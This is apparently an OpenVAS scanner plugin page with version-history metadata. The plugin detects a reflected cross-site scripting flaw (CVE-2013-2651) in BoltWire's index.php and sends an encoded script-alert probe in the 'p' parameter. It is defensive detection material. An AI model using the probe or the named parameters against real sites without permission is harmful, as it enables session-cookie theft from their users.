BoltWire Multiple Cross Site Scripting Vulnerabilities
2013-11-07T00:00:00
ID OPENVAS:1361412562310803961 Type openvas Reporter Copyright (c) 2013 Greenbone Networks GmbH Modified 2018-09-15T00:00:00
Description
This host is installed with BoltWire and is prone to multiple cross-site
scripting vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_boltwire_mult_xss_vuln.nasl 11401 2018-09-15 08:45:50Z cfischer $
#
# BoltWire Multiple Cross Site Scripting Vulnerabilities
#
# Authors:
# Shashi Kiran N <nskiran@secpod.com>
#
# Copyright:
# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.803961");
script_version("$Revision: 11401 $");
script_cve_id("CVE-2013-2651");
script_bugtraq_id(62907);
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_tag(name:"last_modification", value:"$Date: 2018-09-15 10:45:50 +0200 (Sat, 15 Sep 2018) $");
script_tag(name:"creation_date", value:"2013-11-07 16:32:49 +0530 (Thu, 07 Nov 2013)");
script_name("BoltWire Multiple Cross Site Scripting Vulnerabilities");
script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to steal the victim's
cookie-based authentication credentials.");
script_tag(name:"affected", value:"BoltWire version 3.5 and earlier");
script_tag(name:"insight", value:"An error exists in the index.php script which fails to properly sanitize
user-supplied input to 'p' and 'content' parameter before using.");
script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.");
script_tag(name:"vuldetect", value:"Send a crafted exploit string via HTTP GET request and check whether
it is able to read the string or not.");
script_tag(name:"summary", value:"This host is installed with BoltWire and is prone to multiple cross-site
scripting vulnerability.");
script_tag(name:"solution_type", value:"WillNotFix");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/62907");
script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/87809");
script_xref(name:"URL", value:"http://packetstormsecurity.com/files/123558");
script_xref(name:"URL", value:"http://archives.neohapsis.com/archives/bugtraq/2013-10/0033.html");
script_category(ACT_ATTACK);
script_tag(name:"qod_type", value:"remote_vul");
script_copyright("Copyright (c) 2013 Greenbone Networks GmbH");
script_family("Web application abuses");
script_dependencies("find_service.nasl", "http_version.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);
if(!can_host_php(port:port)){
exit(0);
}
foreach dir( make_list_unique( "/", "/bolt", "/boltwire", "/field", "/bolt/field", "/boltwire/field", cgi_dirs( port:port ) ) ) {
if(dir == "/") dir = "";
url = dir + "/index.php";
res = http_get_cache( item:url, port:port );
if( isnull( res ) ) continue;
if(res && "<title>BoltWire: Main</title>" >< res && "Radical Results!" >< res) {
url = url + '?p=%253Cscript%253Ealert(%2527XSS-TEST%2527)%253B%253C%252Fscript%253E';
match = "<script>alert\('XSS-TEST'\);</script>";
if(http_vuln_check(port:port, url:url, check_header:TRUE,
pattern:match))
{
report = report_vuln_url( port:port, url:url );
security_message(port:port, data:url);
exit(0);
}
}
}
{"id": "OPENVAS:1361412562310803961", "bulletinFamily": "scanner", "title": "BoltWire Multiple Cross Site Scripting Vulnerabilities", "description": "This host is installed with BoltWire and is prone to multiple cross-site\nscripting vulnerability.", "published": "2013-11-07T00:00:00", "modified": "2018-09-15T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803961", "reporter": "Copyright (c) 2013 Greenbone Networks GmbH", "references": ["http://xforce.iss.net/xforce/xfdb/87809", "http://packetstormsecurity.com/files/123558", "http://archives.neohapsis.com/archives/bugtraq/2013-10/0033.html", "http://www.securityfocus.com/bid/62907"], "cvelist": ["CVE-2013-2651"], "type": "openvas", "lastseen": "2018-09-17T13:38:26", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-2651"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This host is installed with BoltWire and is prone to multiple cross-site\nscripting vulnerability.", "edition": 3, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "87a186bae92915ade30a2e8d2b78293e5a7caac9db2abbd9248580986bf08708", "hashmap": [{"hash": "8f156380e437db87d2a6ad5bafb657ec", "key": "references"}, {"hash": "23f2aa121d8b7c93f7858caa59319161", "key": "title"}, {"hash": "6aabec8538e6cc52ac504f3fc41e1a5d", "key": "sourceData"}, {"hash": "7c78c0773971ae7bb91636180e6c0b96", "key": "href"}, {"hash": "8159ae8b1c03071948ff6923d0329755", "key": "pluginID"}, {"hash": "1a99a5f9a50e5bac3b749d8558d5e46b", "key": "reporter"}, {"hash": "1a65aed9503172bfd5e50b772686fbb8", "key": "modified"}, {"hash": "acf18ea7294d3c68d5536ce2040c3a70", "key": "cvelist"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d9345031f03dfce0cb3428868fe310db", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "7bfd2c08385672e99af499a09239625d", "key": "description"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803961", "id": "OPENVAS:1361412562310803961", "lastseen": "2018-08-30T19:24:33", "modified": "2018-08-24T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310803961", "published": "2013-11-07T00:00:00", "references": ["http://xforce.iss.net/xforce/xfdb/87809", "http://packetstormsecurity.com/files/123558", "http://archives.neohapsis.com/archives/bugtraq/2013-10/0033.html", "http://www.securityfocus.com/bid/62907"], "reporter": "Copyright (c) 2013 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_boltwire_mult_xss_vuln.nasl 11103 2018-08-24 10:37:26Z mmartin $\n#\n# BoltWire Multiple Cross Site Scripting Vulnerabilities\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803961\");\n script_version(\"$Revision: 11103 $\");\n script_cve_id(\"CVE-2013-2651\");\n script_bugtraq_id(62907);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-24 12:37:26 +0200 (Fri, 24 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-07 16:32:49 +0530 (Thu, 07 Nov 2013)\");\n script_name(\"BoltWire Multiple Cross Site Scripting Vulnerabilities\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to steal the victim's\ncookie-based authentication credentials.\n\nImpact Level: Application\");\n script_tag(name:\"affected\", value:\"BoltWire version 3.5 and earlier\");\n script_tag(name:\"insight\", value:\"An error exists in the index.php script which fails to properly sanitize\nuser-supplied input to 'p' and 'content' parameter before using.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted exploit string via HTTP GET request and check whether\nit is able to read the string or not.\");\n script_tag(name:\"summary\", value:\"This host is installed with BoltWire and is prone to multiple cross-site\nscripting vulnerability.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/62907\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/87809\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/123558\");\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/bugtraq/2013-10/0033.html\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nif(!can_host_php(port:port)){\n exit(0);\n}\n\nforeach dir( make_list_unique( \"/\", \"/bolt\", \"/boltwire\", \"/field\", \"/bolt/field\", \"/boltwire/field\", cgi_dirs( port:port ) ) ) {\n\n if(dir == \"/\") dir = \"\";\n url = dir + \"/index.php\";\n res = http_get_cache( item:url, port:port );\n if( isnull( res ) ) continue;\n\n if(res && \"<title>BoltWire: Main</title>\" >< res && \"Radical Results!\" >< res) {\n url = url + '?p=%253Cscript%253Ealert(%2527XSS-TEST%2527)%253B%253C%252Fscript%253E';\n match = \"<script>alert\\('XSS-TEST'\\);</script>\";\n\n if(http_vuln_check(port:port, url:url, check_header:TRUE,\n pattern:match))\n {\n report = report_vuln_url( port:port, url:url );\n security_message(port:port, data:url);\n exit(0);\n }\n }\n}\n", "title": "BoltWire Multiple Cross Site Scripting Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:24:33"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-2651"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is installed with BoltWire and is prone to multiple cross-site\nscripting vulnerability.", "edition": 1, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "62bec75d0d1de881c3d3ed21bc9accac7d9a9f86b8ac6a1cfa95128e33d62db5", "hashmap": [{"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "8f156380e437db87d2a6ad5bafb657ec", "key": "references"}, {"hash": "bb6b0fc7b64d17d15f06a6745e0fb713", "key": "modified"}, {"hash": "23f2aa121d8b7c93f7858caa59319161", "key": "title"}, {"hash": "7c78c0773971ae7bb91636180e6c0b96", "key": "href"}, {"hash": "8159ae8b1c03071948ff6923d0329755", "key": "pluginID"}, {"hash": "1a99a5f9a50e5bac3b749d8558d5e46b", "key": "reporter"}, {"hash": "acf18ea7294d3c68d5536ce2040c3a70", "key": "cvelist"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "d9345031f03dfce0cb3428868fe310db", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "0d02fdf654de351134109a2272798893", "key": "sourceData"}, {"hash": "7bfd2c08385672e99af499a09239625d", "key": "description"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803961", "id": "OPENVAS:1361412562310803961", "lastseen": "2017-07-02T21:11:14", "modified": "2017-03-30T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310803961", "published": "2013-11-07T00:00:00", "references": ["http://xforce.iss.net/xforce/xfdb/87809", "http://packetstormsecurity.com/files/123558", "http://archives.neohapsis.com/archives/bugtraq/2013-10/0033.html", "http://www.securityfocus.com/bid/62907"], "reporter": "Copyright (c) 2013 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_boltwire_mult_xss_vuln.nasl 5798 2017-03-30 15:23:49Z cfi $\n#\n# BoltWire Multiple Cross Site Scripting Vulnerabilities\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803961\");\n script_version(\"$Revision: 5798 $\");\n script_cve_id(\"CVE-2013-2651\");\n script_bugtraq_id(62907);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-30 17:23:49 +0200 (Thu, 30 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-07 16:32:49 +0530 (Thu, 07 Nov 2013)\");\n script_name(\"BoltWire Multiple Cross Site Scripting Vulnerabilities\");\n\n tag_summary = \"This host is installed with BoltWire and is prone to multiple cross-site\nscripting vulnerability.\";\n\n tag_vuldetect = \"Send a crafted exploit string via HTTP GET request and check whether\nit is able to read the string or not.\";\n\n tag_insight = 'An error exists in the index.php script which fails to properly sanitize\nuser-supplied input to \"p\" and \"content\" parameter before using.';\n\n tag_impact = \"Successful exploitation will allow remote attackers to steal the victim's\ncookie-based authentication credentials.\n\nImpact Level: Application\";\n\n tag_affected = \"BoltWire version 3.5 and earlier\";\n\n tag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"vuldetect\" , value : tag_vuldetect);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/62907\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/87809\");\n script_xref(name : \"URL\" , value : \"http://packetstormsecurity.com/files/123558\");\n script_xref(name : \"URL\" , value : \"http://archives.neohapsis.com/archives/bugtraq/2013-10/0033.html\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Variable Initialization\nport = \"\";\nreq = \"\";\nres = \"\";\nurl = \"\";\nmatch = \"\";\n\nport = get_http_port(default:80);\n\nif(!can_host_php(port:port)){\n exit(0);\n}\n\nforeach dir( make_list_unique( \"/\", \"/bolt\", \"/boltwire\", \"/field\", \"/bolt/field\", \"/boltwire/field\", cgi_dirs( port:port ) ) ) {\n\n if(dir == \"/\") dir = \"\";\n url = dir + \"/index.php\";\n res = http_get_cache( item:url, port:port );\n if( isnull( res ) ) continue;\n\n ## Confirm the application\n if(res && \"<title>BoltWire: Main</title>\" >< res && \"Radical Results!\" >< res) {\n ## Construct the attack request\n url = url + '?p=%253Cscript%253Ealert(%2527XSS-TEST%2527)%253B%253C%252Fscript%253E';\n match = \"<script>alert\\('XSS-TEST'\\);</script>\";\n\n if(http_vuln_check(port:port, url:url, check_header:TRUE,\n pattern:match))\n {\n report = report_vuln_url( port:port, url:url );\n security_message(port:port, data:url);\n exit(0);\n }\n }\n}\n", "title": "BoltWire Multiple Cross Site Scripting Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T21:11:14"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-2651"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is installed with BoltWire and is prone to multiple cross-site\nscripting vulnerability.", "edition": 4, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "b2143ab18b7c1dade9d068be338ea735abe32d5389bef6e85a1fc27d3bf8f099", "hashmap": [{"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "8f156380e437db87d2a6ad5bafb657ec", "key": "references"}, {"hash": "23f2aa121d8b7c93f7858caa59319161", "key": "title"}, {"hash": "6aabec8538e6cc52ac504f3fc41e1a5d", "key": "sourceData"}, {"hash": "7c78c0773971ae7bb91636180e6c0b96", "key": "href"}, {"hash": "8159ae8b1c03071948ff6923d0329755", "key": "pluginID"}, {"hash": "1a99a5f9a50e5bac3b749d8558d5e46b", "key": "reporter"}, {"hash": "1a65aed9503172bfd5e50b772686fbb8", "key": "modified"}, {"hash": "acf18ea7294d3c68d5536ce2040c3a70", "key": "cvelist"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "d9345031f03dfce0cb3428868fe310db", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "7bfd2c08385672e99af499a09239625d", "key": "description"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803961", "id": "OPENVAS:1361412562310803961", "lastseen": "2018-09-01T23:56:16", "modified": "2018-08-24T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310803961", "published": "2013-11-07T00:00:00", "references": ["http://xforce.iss.net/xforce/xfdb/87809", "http://packetstormsecurity.com/files/123558", "http://archives.neohapsis.com/archives/bugtraq/2013-10/0033.html", "http://www.securityfocus.com/bid/62907"], "reporter": "Copyright (c) 2013 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_boltwire_mult_xss_vuln.nasl 11103 2018-08-24 10:37:26Z mmartin $\n#\n# BoltWire Multiple Cross Site Scripting Vulnerabilities\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803961\");\n script_version(\"$Revision: 11103 $\");\n script_cve_id(\"CVE-2013-2651\");\n script_bugtraq_id(62907);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-24 12:37:26 +0200 (Fri, 24 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-07 16:32:49 +0530 (Thu, 07 Nov 2013)\");\n script_name(\"BoltWire Multiple Cross Site Scripting Vulnerabilities\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to steal the victim's\ncookie-based authentication credentials.\n\nImpact Level: Application\");\n script_tag(name:\"affected\", value:\"BoltWire version 3.5 and earlier\");\n script_tag(name:\"insight\", value:\"An error exists in the index.php script which fails to properly sanitize\nuser-supplied input to 'p' and 'content' parameter before using.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted exploit string via HTTP GET request and check whether\nit is able to read the string or not.\");\n script_tag(name:\"summary\", value:\"This host is installed with BoltWire and is prone to multiple cross-site\nscripting vulnerability.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/62907\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/87809\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/123558\");\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/bugtraq/2013-10/0033.html\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nif(!can_host_php(port:port)){\n exit(0);\n}\n\nforeach dir( make_list_unique( \"/\", \"/bolt\", \"/boltwire\", \"/field\", \"/bolt/field\", \"/boltwire/field\", cgi_dirs( port:port ) ) ) {\n\n if(dir == \"/\") dir = \"\";\n url = dir + \"/index.php\";\n res = http_get_cache( item:url, port:port );\n if( isnull( res ) ) continue;\n\n if(res && \"<title>BoltWire: Main</title>\" >< res && \"Radical Results!\" >< res) {\n url = url + '?p=%253Cscript%253Ealert(%2527XSS-TEST%2527)%253B%253C%252Fscript%253E';\n match = \"<script>alert\\('XSS-TEST'\\);</script>\";\n\n if(http_vuln_check(port:port, url:url, check_header:TRUE,\n pattern:match))\n {\n report = report_vuln_url( port:port, url:url );\n security_message(port:port, data:url);\n exit(0);\n }\n }\n}\n", "title": "BoltWire Multiple Cross Site Scripting Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2018-09-01T23:56:16"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-2651"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is installed with BoltWire and is prone to multiple cross-site\nscripting vulnerability.", "edition": 2, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "b2143ab18b7c1dade9d068be338ea735abe32d5389bef6e85a1fc27d3bf8f099", "hashmap": [{"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "8f156380e437db87d2a6ad5bafb657ec", "key": "references"}, {"hash": "23f2aa121d8b7c93f7858caa59319161", "key": "title"}, {"hash": "6aabec8538e6cc52ac504f3fc41e1a5d", "key": "sourceData"}, {"hash": "7c78c0773971ae7bb91636180e6c0b96", "key": "href"}, {"hash": "8159ae8b1c03071948ff6923d0329755", "key": "pluginID"}, {"hash": "1a99a5f9a50e5bac3b749d8558d5e46b", "key": "reporter"}, {"hash": "1a65aed9503172bfd5e50b772686fbb8", "key": "modified"}, {"hash": "acf18ea7294d3c68d5536ce2040c3a70", "key": "cvelist"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "d9345031f03dfce0cb3428868fe310db", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "7bfd2c08385672e99af499a09239625d", "key": "description"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803961", "id": "OPENVAS:1361412562310803961", "lastseen": "2018-08-24T21:34:12", "modified": "2018-08-24T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310803961", "published": "2013-11-07T00:00:00", "references": ["http://xforce.iss.net/xforce/xfdb/87809", "http://packetstormsecurity.com/files/123558", "http://archives.neohapsis.com/archives/bugtraq/2013-10/0033.html", "http://www.securityfocus.com/bid/62907"], "reporter": "Copyright (c) 2013 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_boltwire_mult_xss_vuln.nasl 11103 2018-08-24 10:37:26Z mmartin $\n#\n# BoltWire Multiple Cross Site Scripting Vulnerabilities\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803961\");\n script_version(\"$Revision: 11103 $\");\n script_cve_id(\"CVE-2013-2651\");\n script_bugtraq_id(62907);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-24 12:37:26 +0200 (Fri, 24 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-07 16:32:49 +0530 (Thu, 07 Nov 2013)\");\n script_name(\"BoltWire Multiple Cross Site Scripting Vulnerabilities\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to steal the victim's\ncookie-based authentication credentials.\n\nImpact Level: Application\");\n script_tag(name:\"affected\", value:\"BoltWire version 3.5 and earlier\");\n script_tag(name:\"insight\", value:\"An error exists in the index.php script which fails to properly sanitize\nuser-supplied input to 'p' and 'content' parameter before using.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted exploit string via HTTP GET request and check whether\nit is able to read the string or not.\");\n script_tag(name:\"summary\", value:\"This host is installed with BoltWire and is prone to multiple cross-site\nscripting vulnerability.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/62907\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/87809\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/123558\");\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/bugtraq/2013-10/0033.html\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nif(!can_host_php(port:port)){\n exit(0);\n}\n\nforeach dir( make_list_unique( \"/\", \"/bolt\", \"/boltwire\", \"/field\", \"/bolt/field\", \"/boltwire/field\", cgi_dirs( port:port ) ) ) {\n\n if(dir == \"/\") dir = \"\";\n url = dir + \"/index.php\";\n res = http_get_cache( item:url, port:port );\n if( isnull( res ) ) continue;\n\n if(res && \"<title>BoltWire: Main</title>\" >< res && \"Radical Results!\" >< res) {\n url = url + '?p=%253Cscript%253Ealert(%2527XSS-TEST%2527)%253B%253C%252Fscript%253E';\n match = \"<script>alert\\('XSS-TEST'\\);</script>\";\n\n if(http_vuln_check(port:port, url:url, check_header:TRUE,\n pattern:match))\n 